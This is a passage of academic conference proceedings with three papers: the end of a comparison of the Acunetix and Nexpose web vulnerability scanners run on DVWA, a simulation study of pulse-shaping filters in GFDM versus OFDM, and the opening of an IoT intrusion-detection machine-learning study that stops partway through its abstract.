– Scanning component-After inserting the target URL, the crawling process begins, during which the scanning component will identify all available web pages and all entry points of the target application. – Attack component: The attack component analyzes the detected data; the application scanner generates an attack module for each input field, each form, and each test vector to trigger the vulnerability. This data is then sent to the server for an appropriate response. – Analysis component: the response from the server is parsed and interpreted as required [12].

3

Penetration Testing Concept

In this section, we provide the idea about application vulnerabilities and their exploitation based on surveys and various articles published between 2015 and 2020. First, vulnerabilities can occur at different levels, such as web application level, hosting level, and network level. Vulnerabilities of any level can also compromise the security of protected web applications. Penetration testing and vulnerability assessments are unique methods of protection that may be used to delaminate each of the technical and logical weaknesses from any of the layers. Its main objective is to audit the one-of-a-kind layers of a device through external experts [13,14]. Vulnerabilities assessments and penetration testing (VAPT) additionally consist of verification of implemented security mechanisms through protection experts, also VAPT performed through an outside protection expert (called pentesters) who is capable of revealing the vulnerabilities using some exploits and vulnerability scanners. In the past 5 years, the cybersecurity field has also discovered other new vulnerabilities and tested some existing vulnerabilities. Every year we get a new top ten OWASP, as well as some other rankings we mentioned in the first section, such as XSS, SQL injection, and CSRF. SQL injection and XSS attacks remain the top security threats to web applications. For the implementation of security, it is difficult or even impossible to write code without loopholes. For example, using parameterized queries that separate query statements from user input can help prevent SQL injection attacks. However, it cannot solve the problem of developers’ inattention, or in some cases, the data provided by the user needs to be aggregated into the query [4], and those security loopholes are observed by Vulnerability Assessment and Penetration Testing techniques. In 2016, Tanjila Farah proposed a black box testing method for implementing and testing XSS and CSRF attacks [11]. This approach makes nearly 30% of Web applications vulnerable to XSS and CSRF attacks. Using black box testing methods, it takes time to launch XSS and CSRF attacks, but it helps to decrease and fix these kinds of vulnerabilities [11]. Additionally, web applications use a database server on the back end, so the website connects to the database, requests data, and presents the received data in the browser. This is where

112

B. Labiad et al.

the SQL injection attack originates from the user. In fact, SQL injection can execute more malicious attacks by executing commands on servers that can accept and configure viruses and other malicious software, including data update, data deletion, and data injection [11]. Sometimes, the attack jumps to the second-order SQL injection, when the payload stored in a database is not credible data which malicious user input, while the SQL fragment in Web applications is credible, but the existing DBMS2 can not distinguish the trusted and untrusted part of a SQL statement [9]. As shown in Fig. 2, Chen Ping proposed a solution which is a defense method of building a proxy server between the web server and a database server, the proxy server has two main functions, one is to detect SQL injection attacks, and the other is to de-randomize the harmless instructions to the standard SQL statement and forward it to DBMS [9].

Fig. 2. SQL injection’s scenario.

There are many types of tools that can be used to discover vulnerabilities in web applications, and as mentioned earlier, exploits are developed using machine learning and other newer concepts. In this article, we choose Nexpose and Acunetix as penetration testing tools that are both used to reveal vulnerabilities on web applications. 3.1

Acunetix

Acunetix is also known as the WAVS penetration testing tool. It can detect many vulnerabilities, including XSS and SQL injection. It is one of the most widely used security assessment tools. The Acunetix software is based on a commercial software package that the buyer must purchase in order to be licensed under an available subscription. Its application is based on a desktop GUI application, which users can easily interact with. In addition, you can manage user reports, for example, generating results and recommendations for resolving the identified security vulnerabilities in the application. All identified vulnerabilities are marked according to their status, such as opened or patched [15].

2

Database Management System.

A Comparative Study of Vulnerabilities Scanners for Web Applications

3.2

113

Nexpose

Nexpose is a unified vulnerability detection solution that scans the network to identify the devices running on it and checks for vulnerabilities in those devices. It analyzes scanned and processed data to generate reports. We can use these reports to assess the security of our network at various levels, provide additional information, and quickly address any weaknesses [16]. According to Sectools in 2015 [17] Nexpose was ranked 9th on the VAPT, while Acuntex was ranked 11th [18].

4

Application and Comparison

In this section, we scan damn vulnerable web applications (DVWA) to uncover vulnerabilities and weaknesses that DVWA has. To make this happen, we use alternatively Acunetix and Nexpose, in order to compare the performance of each of them in terms of features. 4.1

Proposed Architecture

In this study, we propose an architecture as shown in Fig. 3 to implement Nexpose and Acunetix, which are our solutions to discover, visualize and report vulnerabilities in different layers of our chosen web application. In this architecture, we uncover all vulnerabilities and assets found in our chosen website to be scanned, it’s: – Damn vulnerable web application (DVWA) We use the most important advantages of Nexpose and Acunetix to uncover the weaknesses and assets in a very short and reasonable time. We ended up having a report in PDF format about all the vulnerabilities found. 4.2

Benchmarking

As mentioned earlier in the architecture and as implemented, we have done a full scan of DVWA with Nexpose, and we have done the same implementation with Acunetix. According to our implementation, DVWA has multiple vulnerabilities including brute force logging, command execution, CSRF, file injection, SQL injection, payload vulnerabilities, XSS and more. Our Acunetix analytics identified 75 vulnerabilities: – – – –

16 critical vulnerabilities 37 midrange vulnerabilities 22 low profile vulnerabilities 6 critical vulnerabilities

With Acunetix we could benefit from many features that its offers to protect from the following attacks:

114

B. Labiad et al.

Fig. 3. Proposed architecture.

– – – – –

CRLF injection attacks Code execution attacks Directory traversal attacks File inclusion attacks Input validation attacks

On the contrary, Nexpose analytics in one asset could identify: – – – –

339 vulnerabilities 39 midrange vulnerabilities 170 low profile vulnerabilities 50 critical vulnerabilities and more

We could generate a full report about all the vulnerabilities found with different proposed solutions to fix them and some other Layers or aspects to secure our web application. After using Nexpose and Acunetix in this implementation, we are able to do a general comparison of all the features that both offer based on the implementation that we have done and also based on different enterprise reviews. In the next tables we made a comparison in four essential components which are features of network and application (Fig. 4). According to these features comparison, Acunetix needs a unique AcuSensor technology to detect more security vulnerabilities than other web application scanners while generating fewer false positives. Acunetix AcuSensor accurately shows vulnerabilities in codes and reports additional debugging information. Instead, Nexpose can offer great performance in different layers and targets without his detection complements as listed in the integration and amelioration section. In conclusion of this Benchmarking, we cannot say that Nexpose is better

A Comparative Study of Vulnerabilities Scanners for Web Applications

Fig. 4. Application for vulnerability scanner software comparison.

Fig. 5. Network for vulnerability scanner software comparison.

115

116

B. Labiad et al.

than Acunetix, or vice versa, but we can evaluate the performance of Nexpose compared to Acunetix (Fig. 5). Regarding vulnerabilities, proper implementation of Input Validation helps to avoid most of the net application vulnerabilities. But, on the opposite hand, handling every input in isolation to avoid surprising program line arguments, user-controlled files, and other suspicious input may be a complicated task, and as a result, the validation is also omitted. Warnings and Error messages will recommend the places of attainable security flaws for each developer and attacker. Static and dynamic analysis tools can find and eliminate vulnerabilities [19,20].

5

Conclusion

Many vulnerabilities appear every day, and there are many tools released to help identify these vulnerabilities. Users need to understand common vulnerabilities and how to use them to detect and protect themselves from threats and attacks. In this article, we briefly describe three known and ranked vulnerabilities on web applications, we described in detail how these vulnerabilities happen and how much could affect a normal user using a web application either by losing their sensitive data or losing control over their websites. Also, we listed two important tools that pentesters use while discovering vulnerabilities in the web application. At the end of this paper, we have done an implementation that could lead us to make a concrete comparison between Nexpose and Acunetix while doing a scan of vulnerabilities applied on the same target, which is DVWA. In this way, the wide range of available systems, called penetrating testing platforms, could be better used and applied, and the new systems that will be developed could be better designed, being able to adopt specific and more optimized processes or a comprehensive approach that fulfills all predefined requirements for the detection of vulnerabilities. Therefore, in the next work, we will be focusing on uncovering those three vulnerabilities using the advantages that AI has brought, especially the detection of vulnerabilities based on machine learning.

References 1. Alzahrani, A., Alqazzaz, A., Fu, H., Almashf, N.: Web application security tools analysis. IEEE (2017) 2. Priyanka, A.K., Smruthi, S.S., Siddhartha, V.R., Engineering College India: WebApplication vulnerabilities: exploitation and prevention. IEEE (2020) 3. Nirmal, K., Janet, B., Kumar, R.: Web application vulnerabilities - the hacker’s treasure. In: Proceedings of the International Conference on Inventive Research in Computing Applications (ICIRCA) (2018). IEEE Xplore Compliant Part Number: CFP18N67-ART, ISBN: 978-1-5386-2456-2 4. Huang, H.C., Zhang, Z.K., Cheng, H.W., Shieh, S.W.: Web application security: threats, countermeasures, and pitfalls. IEEE (2017) 5. Moore, M.: Penetration testing and metasploit (2017)

A Comparative Study of Vulnerabilities Scanners for Web Applications

117

6. Wang, Y., Yang, J.: Ethical hacking and network defense: choose your best network vulnerability scanning tool. In: Proceedings of the 31st International Conference on Advanced Information Networking and Applications Workshops (2017) 7. Gupta, M.K. , Govil, M.C., Singh, G.: Predicting cross-site scripting (XSS) security vulnerabilities in web applications. In: Proceedings of the 12th International Joint Conference on Computer Science and Software Engineering (JCSSE) (2015) 8. D’silva, K., Vanajakshi, J., Manjunath, K.N., Prabhu, S.: An effective method for preventing SQL injection attack and session hijacking. In: Proceedings of the 2017 2nd IEEE International Conference on Recent Trends in Electronics Information and Communication Technology (RTEICT), India, 19–20 May 2017 9. Ping, C.: A second-order SQL injection detection method. IEEE (2017). 978-15090-64144/17/31.00 10. Parimala, G., Sangeetha, M., AndalPriyadharsini, R.: Efficient web vulnerability detection tool for sleeping giant-cross site request forgery. In: Proceedings of the 2018 National Conference on Mathematical Techniques and Its Applications (NCMTA) (2018) 11. Nagpure, S., Kurkure, S.: Vulnerability assessment and penetration testing of web application. In: Proceedings of the 2017 Third International Conference on Computing, Communication, Control and Automation (ICCUBEA) (2017) 12. Sagar, D., Kukreja, S., Brahma, J., Tyagi, S., Jain, P.: Studying open source vulnerability scanners for vulnerabilities in web applications. IIOAB J. (2018). iioab.org 13. Holik, F., Neradova, S.: Vulnerabilities of modern web applications. In: MIPRO 2017, Opatija, Croatia, 22–26 May 2017 14. Hasan, A.M., Divyakant, T., Meva, A.K., Roy, J.D.: Perusal of web application security approach. In: International Conference on Intelligent Communication and Computational Techniques (ICCT) Manipal University Jaipur, 22–23 December 2017 15. Utaya Surian, R., Rahman, N.A.A., Nathan, Y.: Scanner: vulnerabilities detection tool for web application. J. Phys. Conf. Ser. (2020) 16. Nexpose: Administration guide, product version 6.4. https://www.rapid7.com/ products/nexpose/. Accessed 02 Mar 2022 17. Sectools.org: Top 125 network security tools (2015). http://sectools.org/. Accessed Jan 2015 18. Goela, J.N., Mehtreb, B.M.: Vulnerability assessment & penetration testing as a cyber defence technology. In Proceedings of the 3rd International Conference on Recent Trends in Computing (ICRTC 2015) (2015) 19. Joshi, C., Singh, U.K.: Analysis of vulnerability scanners in quest of current information security landscape. Int. J. Comput. Appl. (IJCA) 146(2), 1–7 (2016). 09758887 20. Joshi, C., Singh, U.K.: Performance evaluation of web application security scanners for more effective defense. Int. J. Sci. Res. Publ. (IJSRP) 6(6), 660–667 (2016). ISSN 2250-3153

The Pulse-Shaping Filter Influence over the GFDM-Based System Karima Ait Bouslam1(B) , Jamal Amadid1 , Radouane Iqdour1,2 , and Abdelouhab Zeroual1 1

I2SP Group, Faculty of Sciences Semlalia, Cadi Ayyad University, Marrakesh, Morocco [email protected], [email protected], [email protected] 2 CRMEF, Marrakesh Safi, Morocco

Abstract. Generalized frequency division multiplexing (GFDM) is a generation of the orthogonal frequency division multiplexing (OFDM) and is considered as a candidate for next-generation wireless communications systems, thanks to its several advantages such as adequate and suitable construction, based on circular convolution and sub-symbol structure, low peak-to-average power ratio (PAPR), low out-of-band (OOB) emission, low latency, relaxed requirements of time, frequency synchronization and high data rate. Due to its spectrum efficiency, the GFDM is an excellent mutli-carrier modulation for a wide range of cognitive radio (CR) systems (For example, machine-to-machine communication using CR techniques, the internet of things (IOT), satellite, military, and so on.). The main component that drives the performance of a GFDM system is the prototype filter design. The present work aims to test, on the one hand, the influence of the pulse shaping filter on the performance of the GFDM system in terms of spectral efficiency and OOB emission for different values of the attenuation factor, and on the other hand the impact of the number of sub-carriers on the GFDM spectrum. The simulation results show that GFDM allows considerable OOB reduction and improved spectral efficiency compared to OFDM modulation. Keywords: 5G Wireless Communication Systems · Spectrum Efficiency · Roll-Off Factor · Out-Of-Band · Orthogonal Frequency Division Multiplexing · Generalized Frequency Division Multiplexing

1

Introduction

In wireless communication systems, there are several technologies that have been proposed (i.e., machine to machine communication that use cognitive radio (CR) approaches, internet of thing, satellite, military,... etc.). These technologies require systems that provide a high data-rate specifications, low latency, massive device connectivity [1,2], as well as, a considerable increase in data volume and high spectral efficiency. In that case multi-carrier modulation have been adopted, c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023  J. Kacprzyk et al. (Eds.): AI2SD 2022, LNNS 712, pp. 118–131, 2023. https://doi.org/10.1007/978-3-031-35251-5_11

The Pulse-Shaping Filter Influence over the GFDM-Based System

119

in order to respond to these requirement, a well known multi-carrier modulation orthogonal frequency-division multiplexing (OFDM) is proposed for 4G wireless network. The OFDM technology involves dividing a high data rate stream into a number of lower rate streams [3,4], which are then transmitted synchronously on a number of orthogonal sub-carriers. Consequently, robustness against multipath fading and resistant to frequency selective fading, high data-rate, are the major benefits of OFDM systems [5]. However, large peak-to-average power ratio (PAPR), out-of-band (OOB) and small spectral efficiency gain (i.e., due to the drawback of cyclic prefix (CP) that must be added for each OFDM symbol), are the main drawbacks of OFDM modulation. Therefore, to overcomes the drawbacks of OFDM modulation and involve it beyond 4G wireless network (i.e., 5G wireless communication), a generalized frequency division Multiplexing (GFDM) have been proposed for 5G wireless communication systems [6], using adequate construction, based in circular convolution filtering and sub-symbol structure [7], the GFDM system can achieve high data rate and low OOB radiation and improves spectrum utilization (i.e., high spectral efficiency). Additionally, the GFDM is an effective multi-carrier modulation for a wide variety of CR systems due to its spectrum efficiency [8]. In the literature, numerous works have focused on the influence of pulse shaping filters on the GFDM using multiple factors as, Bit Error Rate (BER) and symbol error rate (SER) [9]. In [10], the effect of enhanced nyquist pulse shaping filters on the GFDM symbol error rate (SER) is investigated by the authors. In [11], an optimal filter design for GFDM under the criteria of rate maximization and OOB emission minimization is considered. The goal of this paper is to investigate the pulse-shaping filter impact on the performance of the GFDM systems, especially the spectrum efficiency and OOB emission. The remainder of this paper is organized as follows. In the Sect. 2, we present the OFDM based system. In Sect. 3, we introduce the simple model related to the GFDM system. Section 4 presents the simulation results and discussion. Finally, Sect. 5 concludes the paper.

2

System Model-Based OFDM

During this part, we examine an OFDM system that split a high data-rate data stream into N low data-rate streams, wich is transmitted into N sub-carriers. Each of them is modulated by quadrature amplitude modulation (QAM), with dk , 0 ≤ k ≤ N − 1 data symbols are modulated by an application of an IFFT. The signal in base band OFDM will be the collection of all dk symbols [12] sm =

N −1 

dk ej2πfk mTe ,

(1)

k=0

fk = k f +f0 , k = 0, 1, 2, .......N − 1

(2)

where, f denotes space between each carrier and 0 ≤ t ≤ Ts , Ts it is the duration of each symbol and fk is the frequency of each sub-carriers. Thus, in

120

K. Ait Bouslam et al.

order to avoid the interference between the sub-carriers it is necessary that the condition of orthogonality verified [13] f .Ts = 1

(3)

The sm are thus obtained by an inverse discrete Fourier transform of the dk symbols. Moreover, we consider a channel without noise. Therefore, the signal received at the reception can be expressed by y(t) =

N −1 

K

dk Hk (t)ej2π(f0 + T )t

(4)

k=0

where, Hk (t) is the transfer function of the channel around frequencyfk and at time t. This function varies slowly and can be assumed to be constant over the period T. yn = y(

N −1  √ n nT )= dk hk ej2πfk N = N DF T −1 (dk hk ) N

(5)

k=0

where, hk is the complex response of the channel at frequency fk .

3

System Model-Based GFDM

Consider a Wireless communication system that transmits data in a block structure composed of K sub-carriers and M sub-symbols. Moreover, we consider the N = K × M be the total number of data symbols in the block. Therefore, the transmitted block is expressed as follows [14] − → d = (d0,0 , ..., dK−1,0 , d1,1 ..., dK−1,1 , d0,M −1 , ..dK−1,M −1 ).

(6)

where, dk,m represents the symbol transmitted on the sub-carrier kth and the mth sub-symbol of the block. Organizing the data symbols into a twodimensional structure, where the rows and columns correspond to the time and frequency resources, respectively, gives the following (K × M ) data matrix. ⎞ ⎛ d0,0 . . . d0,M −1 ⎟ ⎜ .. .. D = ⎝ ... (7) ⎠. . . dK−1,0 . . . dK−1,M −1 3.1

GFDM Transmitter

The block diagram of the GFDM transmitter is shown in Fig. 1. In the first step, data from a binary source is arranged in K sub-carriers each transmitting

The Pulse-Shaping Filter Influence over the GFDM-Based System

121

Fig. 1. Block diagram of the GFDM transmitter

M sub-symbols. The binary data is mapped in quadrature amplitude modulation, then the data are sampled with a factor of 1 to 2, the data are sampled with a factor as reported in [15]. dN k [n]

=

M −1 

dk,m δ[n − mN ], n = 0, ...., N M − 1.

(8)

m=0

These dN k sequences are filtered with a transmission filter. gk,m = g[(n − mk)modN ].exp(j2π

k n). K

(9)

where, g[n] denotes the impulse response of a prototype filter with N samples, while k, m and n are sub-carrier, sub-symbol and sample indexes respectively. We note that the modulo operation combined with a prototype filter effectively produces a circular convolution of over-sampled data symbols called tail biting as reported in [16,17]. Moreover, the length of sequence after the filtering process is N samples. The transmit signal on each sub-carrier is given by the following expression kn . xk [n] = (dN k  g)[n].W

(10)

where  denotes circular convolution and W kn is expressed as W kn = e(j2πkn/K) .

(11)

Circular convolution is used to modulate transmit filters with data symbols [18], which means that the GFDM block is self-contained in N samples and the transmit signal of a data block is then obtained by using the sum of all the signals of the sub-carriers K−1  x[n] = xk [n]. (12) k=0

Hence x[n] =

K−1 −1 M  k=0 m=0

dk,m δ[(n − mN )modN ]  g[n]e

j2πkn K

.

(13)

122

K. Ait Bouslam et al.

Finally, the base band transmit the numerical signal obtained by the sum of all sub-carrier and sub-symbol signals according to the following expression [16]. x[n] =

K−1 −1 M 

dk,m g[n].

(14)

k=0 m=0

Only one cyclic prefix (CP ) can be added to the set of GFDM symbols [18], which leads to the transmit signal x ˜[n] that is subsequently sent to the radio channel. In order to reduce the interference between the M inter-frame symbols (IFT or Inter Frame Interference), the CP duration must be equal to [19] Tcp = Tg + Th + Tg .

(15)

where, Tg is the duration of the filter and Th is the length of the impulse response of the channel h[n]. It is important to note that this duration must be smaller in order to avoid overlapping the GFDM symbol. 3.2

GFDM Receiver

The base band samples received by the receiver (shown in Fig. 2) are given by the following expression, [20] y˜[n] = h[n] ∗ x ˜[n] + v˜[n].

(16)

˜ is an Additive White Gaussian where, h[n] is the channel impulse response, v[n] Noise (AWGN) vector, and ∗ represents the convolution product.

Fig. 2. The GFDM receiver model

Moreover, we assume that perfect knowledge of the channel impulse response time and frequency synchronization at the receiver. In addition, the cyclic extension can be ignored and removed, as it makes the convolution with the channel circular, therefore, the equalized receiver signal can be written as follows z = IDF T (

DF T (y[n]) . DF T (h[n])

(17)

Note that DFT and IDFT represent the fast Fourier transform and the inverse Fourier transform. After the passage by demodulator GFDM we apply a reception filter such as the matched filter, zero forcing or minimum mean square error

The Pulse-Shaping Filter Influence over the GFDM-Based System

123

[21]. Consequently, the performance of GFDM receivers depends on the prototype filter, designed to minimize losses, the prototype GFDM filter must also meet other requirements, such as low OOB emission. Next, we define the pulse-shaping filter used throughout this work. 3.3

Rectangular Filter

The rectangular filter known also as a filter window is defined as 1 si t ∈ [T1 , T2 ] h(t) = . 0 else 3.4

(18)

Raised-Cosinise (RC)

Note that data transmission over band-limited channels requires pulse-shaping to eliminate or control inter-symbol interference (ISI) [22]. In this context, we introduce the RC filter, as it allows to control the pulse-shape thanks to the roll off factor which takes values between 0 and 1. Thus, the expression of this filter written as the follows.

π 1 T si t = ± 2a 4 sin( 2a ) παt . (19) gRC = cos( ) T sinc( Tt ) 1−( 2αt else )2 T

3.5

Root Raised-Cosinise (RRC)

The RRC (root raised cosine) filters are presented as a pulse-shaping filter for transmission and a suitable filter for reception of messages [23], it allows minimizes the interference between the symbols of ISI messages because it satisfies the Nyquist criterion [24], the impulse response defined by the equation bellow gRRC =

4α π cos(π(1

+ α)) + (1 − α)sin(π(1 − α) Tt ) . 1 − (4α Tt )2

(20)

where, T is the symbol period.

4

Numerical Results

In this section, we test the influence of the pulse-shaping filter (rectangular, RC and RRC filter) on the performance of the GFDM, in comparison with OFDM, in terms of spectrum efficiency and OOB emission for different values of the roll-off factor. We will use the power spectral density (PSD). The simulation was done in MatLab. The parameters used throughout this work are listed in Table 1 and 2 bellow: In the first part of the simulation, we compare the PSD of the GFDM and OFDM modulations by applying respectively, in the time domain, the three filters namely rectangular, RC and RRC. In the case of the RC and RRC filters, the rounding factor is varied using these three values (0.1, 0,5, 0.9). In the second part, we examine the influence of the number of sub-carriers on the spectrum efficiency.

124

K. Ait Bouslam et al. Table 1. GFDM simulation parameters Number of total sub-carriers

512

Number of active sub-carriers

14

Number of active sub-carriers

201

Modulation used

QAM

Number of samples per cyclic prefix CP 0 Number of sub-symbol

15

Table 2. OFDM simulation parameters Number of total sub-carriers

512

Number of active sub-carriers

14

Number of active sub-carriers

201

Modulation used

QAM

Number of samples per cyclic prefix CP 0

4.1

The Impact of the the Designed Pulse-Shaping Filter

In Fig. 3, we plot the P SD[dB] versus the frequency range, we can see that the use of a rectangular filter allows only a small decrease in OOB emission for both techniques. Despite its simplicity the rectangular filter remains without effect on the reduction of OOB, this result shows the importance of filter on the spectrum efficiency. In Figs. 4, 5 and 6, we plot the P SD[dB] versus the frequency range, where the effect of the RC filter on the OOB is evaluated using an RC filter in the time domain with a rounding factor α = 0.1. There is a reduction in OOB of up to −25 dB for GFDM and a deviation of about 32.2 dB compared to OFDM. Increasing the rounding factor (i.e., α = 0.5), we observe a reduction in OOB for GFDM compared to OFDM. As with OFDM we notice a deviation of about 48.623 dB. In this last step we select a rounding factor of α = 0.9, we observe a reduction of a value of 40 dB while the OFDM spectrum remains almost unchanged. From these results we can conclude that the spectrum efficiency depends on the two factors, the first is the nature of the shaping filter choice, the second is the rounding factor, so the RC filter is a good choice, since it favors the reduction of the spectrum ripples for different values of the rounding factor α. In Figs. 7, 8 and 9, we plot the P SD[dB] versus the frequency range. Moreover, we notice that the use of an RRC filter decreases the OOB power, for the value α = 0.1 the difference between the two signals OFDM and GFDM is 22.72 dB, while for the value α = 0.5 the gap increases to the value 24.899 dB. Furthermore for the value α = 0.9 the deviation equals 31.425 dB. It can be seen that the use of the RRC filter largely reduces the off-spectrum ripples, which encourage the increase of the spectral efficiency.

The Pulse-Shaping Filter Influence over the GFDM-Based System

125

Fig. 3. The effect of the rectangular filter shaping on the OOB emission and spectral efficiency spectrum in the OFDM and GFDM techniques

Fig. 4. The effect of the RC filter shaping on the OOB emission and spectral efficiency spectrum in the OFDM and GFDM techniques (α = 0.1)

126

K. Ait Bouslam et al.

Fig. 5. The effect of the RC filter shaping on the OOB emission and spectral efficiency spectrum in the OFDM and GFDM techniques (α = 0.5)

Fig. 6. The effect of the RC filter shaping on the OOB emission and spectral efficency spectrum in the OFDM and GFDM techniques (α = 0.9)

The Pulse-Shaping Filter Influence over the GFDM-Based System

127

Fig. 7. The effect of the RRC filter shaping on the OOB emission and spectral efficiency spectrum in the OFDM and GFDM techniques (α = 0.1)

Fig. 8. The effect of the RRC filter shaping on the OOB emission and spectral efficiency spectrum in the OFDM and GFDM techniques (α = 0.5)

128

K. Ait Bouslam et al.

Fig. 9. The effect of the RRC filter shaping on the OOB emission and spectral efficiency spectrum in the OFDM and GFDM techniques (α = 0.9)

We can conclude that the choice of the prototype filter used in the shaping is a very important criterion to improve the spectrum efficiency. Moreover, the order of the rounding factor (roll off) α is also a determining factor, since for a high value of this factor in the time domain the filter becomes wider and in the spectral domain becomes narrower and more selective, which allows to minimize the side lobes ripples. Consequently we can overcome the problem of the spectral efficiency problem in 5G networks. These results confirm that GFDM modulation is more efficient than OFDM, in all studied scenarios.

4.2

Influence of the Number of Sub-carriers

In this part we will study the effect of the number of active sub-carriers on the spectrum of the PSD. Note that in this part we will use an RC filter with a rounding factor equal to 0.9, in order to compare spectrum efficiency of OFDM and GFDM as well as to notice the impact of the number of samples used. In Fig. 10, we plot the P SD[dB] versus the frequency, we can see that the out-of-band emission decreases to −32 dB for a number of samples of 401. In the other hand, in Fig. 11, we plot the P SD[dB] versus the frequency, the OOB decreases to −40 dB for a number of samples equal to 201, and the difference between GFDM and OFDM is about 30 dB. From these results we can see that more the number of sub-carriers increases more OOB increase, because OFDM symbol is affected by the ICI interference between the sub-carriers and the ISI interference between the sub-symbols which leads to an increase in the out-of-band ripple. From these results, we can note that the use of GFDM modulation can reduce considerably the OOB emission in comparison with OFDM

The Pulse-Shaping Filter Influence over the GFDM-Based System

129

Fig. 10. The PSD versus frequency spectrum with a number of sub-carriers equal to 401

Fig. 11. The PSD versus frequency spectrum with a number of sub-carriers equal to 201

130

K. Ait Bouslam et al.

modulation, resulting in an improved spectral efficiency which makes it a promising candidate for 5G wireless networks.

5

Conclusion

In this paper, we examine the influence of the pulse-shaping filter on the performance of the GFDM system notably spectrum efficiency and OOB emission for different values of the roll-off factor. A comparison with OFDM modulation is performed. The simulation results show that RC pulse filter gives better performance in the GFDM spectrum with a large value of the roll-off factor. In addition, it can achieve more OOB reduction than the rectangular filter and RRC filter. The influence of the number of subcarriers on the GFDM spectrum is also tested.

References 1. Liu, G., Jiang, D.: 5g: vision and requirements for mobile communication system towards year 2020. Chinese J. Eng. 2016(2016), 8 (2016) 2. Ateya, A.A., Muthanna, A., Makolkina, M., Koucheryavy, A.: Study of 5g services standardization: specifications and requirements. In: 2018 10th International Congress on Ultra Modern Telecommunications and Control Systems and Workshops (ICUMT), pp. 1–6. IEEE (2018) 3. Hamamreh, J.M., Hajar, A., Abewa, M.: Orthogonal frequency division multiplexing with subcarrier power modulation for doubling the spectral efficiency of 6g and beyond networks. Trans. Emerg. Telecommun. Technol. 31(4), e3921 (2020) 4. Hazareena, A., Aziz Mustafa, B.: A survey: on the waveforms for 5g. In: 2018 Second International Conference on Electronics, Communication and Aerospace Technology (ICECA), pp. 64–67. IEEE (2018) 5. Shawqi, F.S., et al.: An overview of ofdm-uwb 60 ghz system in high order modulation schemes. In: 2020 4th International Symposium on Multidisciplinary Studies and Innovative Technologies (ISMSIT), pp. 1–6. IEEE (2020) 6. Fettweis, G., Krondorf, M., Bittner, S.: Gfdm-generalized frequency division multiplexing. In: VTC Spring 2009-IEEE 69th Vehicular Technology Conference, pp. 1–4. IEEE (2009) 7. Michailow, N., Gaspar, I., Krone, S., Lentmaier, M., Fettweis, G.: Generalized frequency division multiplexing: Analysis of an alternative multi-carrier technique for next generation cellular systems. In: 2012 International Symposium on Wireless Communication Systems (ISWCS), pp. 171–175. IEEE (2012) 8. Mestoui, J., El Ghzaoui, M.: Theoretical analysis and performance comparison of multi-carrier waveforms for 5g wireless applications. Int. J. Integr. Eng. 13(6), 202–219 (2021) 9. Han, S., Sung, Y., Lee, Y.H.:. Filter design for generalized frequency-division multiplexing. IEEE Trans. Sig. Process. 65(7), 1644–1659 (2016) 10. Tai, C.-L., Su, B., Chen, P.-C.: Optimal filter design for gfdm that minimizes papr under performance constraints. In: 2018 IEEE Wireless Communications and Networking Conference (WCNC), pp. 1–6 (2018)

The Pulse-Shaping Filter Influence over the GFDM-Based System

131

11. Chen, P.-C., Su, B.: Filter optimization of out-of-band radiation with performance constraints for gfdm systems. In: 2017 IEEE 18th International Workshop on Signal Processing Advances in Wireless Communications (SPAWC), pp. 1–5 (2017) 12. Van Nee, R.D.J., Prasad, R.: Ofdm for wireless multimedia communications (2000) 13. Zhou, Y., Jiang, T.: Active point modification for sidelobe suppression with papr constraint in ofdm systems. Wireless Netw. 19(7), 1653–1663 (2013) 14. Na, Z., Lv, J., Zhang, M., Peng, B., Xiong, M., Guan, M.: Gfdm based wireless powered communication for cooperative relay system. IEEE Access 7, 50971–50979 (2019) 15. Matth´e, M., Mendes, L., Gaspar, I., Michailow, N., Zhang, D., Fettweis, G.: Precoded GFDM transceiver with low complexity time domain processing. EURASIP J. Wirel. Commun. Networking 2016(1), 138 (2016) 16. Gaspar, I., Mendes, L., Michailow, N., Fettweis, G.: A synchronization technique for generalized frequency division multiplexing. EURASIP J. Adv. Sig. Process. 2014, 67 (2014) 17. Kumar, A., Magarini, M.: Improved Nyquist Pulse Shaping Filters for Generalized Frequency Division Multiplexing, November 2016 18. Yamini, A., Nevatha, J., Kannan, S., Raju, S.: GFDM-Based Device to Device Systems in 5G Cellular Networks, pp. 653–660, May 2021 19. Tiwari, S., Das, S.S., Bandyopadhyay, K.K.: Precoded gfdm system to combat inter carrier interference: Performance analysis. ArXiv, abs/1506.03744 (2015) 20. Dias, W.D., Mendes, L.L., Rodrigues, J.J.P.C.: Low complexity gfdm receiver for frequency-selective channels. IEEE Commun. Lett. 23(7), 1166–1169 (2019) 21. Farhang, A., Marchetti, N., Doyle, L.E.: Low-complexity modem design for GFDM. IEEE Trans. Sig. Process. 64(6), 1507–1518 (2016). Conference Name: IEEE Transactions on Signal Processing 22. Alexandru, N.D., Balan, A.L.: A generalization of raised cosine pulses. In: 2016 International Conference on Development and Application Systems (DAS), pp. 139–142, Suceava, Romania. IEEE, May 2016 23. Huang, X., Saniie, J., Bakhtiari, S., Heifetz, A.: Pulse shaping and matched filters for EMAT communication system. In: 2019 IEEE International Conference on Electro Information Technology (EIT), pp. 1–4, May 2019. ISSN: 2154–0373 24. Daumont, S., Rihawi, B., Lou¨et, Y.: Root raised cosine filter influences on PAPR distribution of single carrier signals, March 2008

Intrusion Detection Systems in Internet of Things Using Machine Learning Algorithms: A Comparative Study Hdidou Rachid(B) , El Alami Mohamed, and Drissi Ahmed ERMIA Team, Department of Mathematics and Computer Science, National School of Applied Sciences Tangier, Abdelmalek Essaadi University, Tétouan, Morocco [email protected], {m.elalamihassoun, a.drissi}@uae.ac.ma

Abstract. The Internet of Things, or IoT, refers to the ability of objects to communicate with one another via the Internet and these objects can transfer data using many types of sensors and mobile or web applications without the need for human intervention. This technology is becoming more important in several fields such as the field of transport and logistics to monitor the temperature of the warehouses of the materials to be transported or monitor the condition of the vehicles themselves. The health field for monitoring the health status of certain disease states, such as heart disease, using sensors. The field of general security as well to give alerts to water, electricity, and gas problems at homes or in factories, or alerts to the danger of forest incidents using sensors and web or mobile applications. Etc.……. Recently, the security of Internet of Things applications and data exchanged in Internet of Things networks will be a necessity with the increased use of this technology in our daily lives. Cybersecurity researchers are trying to offer solutions adapted to Internet of Things networks. Several solution paths have been proposed in recent years, including solutions based on cryptography to secure communication and data exchange, solutions based on Blockchain for the security of communication between devices in Internet of Things networks, and solutions based on Intrusion Detection Systems as well. Intrusion Detection Systems are considered one of the techniques most discussed by researchers to implement security solutions for the Internet of Things, especially IDSs based on artificial intelligence techniques such as Machine Learning. This paper presented a comparison between five Machine Learning algorithms (Support Vector Machine, J48, Random Forest, Decision Table, and Naive Bayes) in the context of intrusion detection. In this comparison, 